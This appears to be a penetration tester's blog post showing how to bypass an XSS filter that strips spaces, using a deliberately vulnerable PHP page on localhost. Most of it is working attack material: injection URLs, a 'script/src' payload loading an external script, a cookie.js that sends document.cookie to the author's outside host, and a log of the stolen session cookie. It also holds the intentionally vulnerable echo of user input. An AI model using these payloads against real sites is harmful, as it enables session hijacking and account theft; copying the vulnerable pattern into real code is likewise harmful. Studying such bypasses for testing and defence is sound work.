Address
304 North Cardinal St.
Dorchester Center, MA 02124

Work Hours
Monday to Friday: 7AM - 7PM
Weekend: 10AM - 5PM

XSS Without Spaces – Finally, an Easier Filter

Back to some web applications, I wanted to share an example of XSS without spaces.

XSS Without Spaces – Introduction

Not too long ago, I had a coworker who was running into a few issues with an XSS filter. He knew that he had injection, but the application seemed to be stripping all the spaces from his input.

This was one of the easier filter bypasses that I’ve had to work on, but I figured that it was still worth sharing. I noticed that I didn’t have a post about this bypass yet, and he couldn’t find anything when searching my blog either.

In the end, he could weaponize the injection, and demonstrate cookie theft!

Vulnerable Application

I will be using a slightly modified version of my vulnerable application from my XSS Phishing post.

You can find the code below, and I’ve highlighted the filter that strips the spaces from user input.

<?php
    session_start();
    
    $cookie_name = "secret";
    $cookie_value = "thisISmy$3cr3t";
    setcookie($cookie_name, $cookie_value, time() + (86400 * 30), "/"); // 86400 = 1 day
?>

<!DOCTYPE html>
<html>
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" type="text/css" href="resources/style.css">

    <title>Vulnerable to XSS Without Spaces</title>
</head>

<body>

<div class="main">
    
Here is my vulnerable form (value parameter):
<form>
    <input type="text" value="<?php echo preg_replace('/\s+/', '', ($_GET['value'])); ?>">
</form>

<script>
    console.log("This is my logger function (I'll need this closing script tag later)!");
</script>

<?php include 'footer.php'; ?>

As you can see from the following screenshot, the filter is stripping all the spaces from user input.

XSS Without Spaces - Filter

For another example, you can see the raw HTTP request that I sent.

GET /noSpaces.php?value=Test%20Parameter%20With%20Spaces HTTP/1.1
Host: 127.0.0.1:8123
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3055.0 Safari/537.36 autochrome/yellow
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=0f0ceab136df688759793bca275eaca7; secret=thisISmy%243cr3t
Connection: close

The response below demonstrates the GET parameter after the application applied the filter.

HTTP/1.1 200 OK
Host: 127.0.0.1:8123
Connection: close
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: secret=thisISmy%243cr3t; expires=Mon, 17-Jun-2019 15:58:40 GMT; Max-Age=2592000; path=/
Content-type: text/html; charset=UTF-8

...

<div class="main">
    
Here is my vulnerable form (value parameter):
<form>
    <input type="text" value="TestParameterWithSpaces">
</form>

<script>
    console.log("This is my logger function (I'll need this closing script tag later)!");
</script>

Injection

First, we verified injection with a simple test.

http://127.0.0.1:8123/noSpaces.php?value=%22%3E%3Cbr%3E%3Cbr%3E%3Cb%3Etest%3C/b%3E%3Ca=%22

We injected HTML without any problems, so we knew we were on the right track.

XSS Without Spaces - HTML Injection

Next, we alerted the document.cookie, to verify that XSS was present (and that the cookies weren’t HttpOnly).

XSS Without Spaces - Cookie Alert

With XSS discovered, it was time to weaponize the vulnerability.

Weaponization

Normally at this point, I would use a simple cookie grabber, and consider this finding complete.

http://127.0.0.1:8123/noSpaces.php?value=%22%3E%3Cscript%3Edocument.write(%27%3Cimg%20src=%22http://r4y.pw:8000/grab.png?cookie=%27%20%2b%20document.cookie%20%2b%20%27%22%20/%3E%27)%3C/script%3E%3Ca=%22

http://127.0.0.1:8123/noSpaces.php?value="><script>document.write('<img src="http://r4y.pw:8000/grab.png?cookie=' + document.cookie + '" />')</script><a="

Unfortunately, this did not work due to the filter. The below output demonstrates (roughly) what we got back from the server.

Here is my vulnerable form (value parameter):
<form>
    <input type="text" value=""><script>document.write('<imgsrc="http://r4y.pw:8000/grab.png?cookie='+document.cookie+'"/>')</script><a="">
</form>

I could verify that XSS still worked without spaces with a simple test.

http://127.0.0.1:8123/noSpaces.php?value=%22%3E%3Csvg/onload=alert(1)%3E%3Ca=%22

XSS Without Spaces - No Spaces

With all this information, I was able to build our final payload.

First, I injected an external JavaScript file, as I could do that without utilizing spaces. The external JS file contained the cookie stealing code, so the space filter would not break anything there.

The final payload looked like this (hey, I said it was easier).

http://127.0.0.1:8123/noSpaces.php?value=%22%3E%3Cscript/src=//r4y.pw/cookie.js%3E%3C/script%3E%3Ca=%22

My cookie.js file was as follows.

document.write('<img src="http://r4y.pw:8000/grab.png?cookie=' + document.cookie + '" />')

When I ran a SimpleHTTPServer on my XSS host, we got the cookies that we wanted!

206.55.101.210 - - [18/May/2019 16:41:46] "GET /grab.png?cookie=PHPSESSID=0f0ceab136df688759793bca275eaca7;%20secret=thisISmy%243cr3t HTTP/1.1" 404 -

XSS Without Spaces – Conclusion

I know that this was a shorter XSS post, but it never helps to have a library of different methods handy.

I’m still hoping to finish up my vulnerable XSS application, so be on the lookout for that.

I also have a few more complicated XSS posts in the pipeline, and I’ll get to them when I have time.

Other than that, I’m still buried deep into exploit development, and just finished an awesome training that I will talk about soon!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.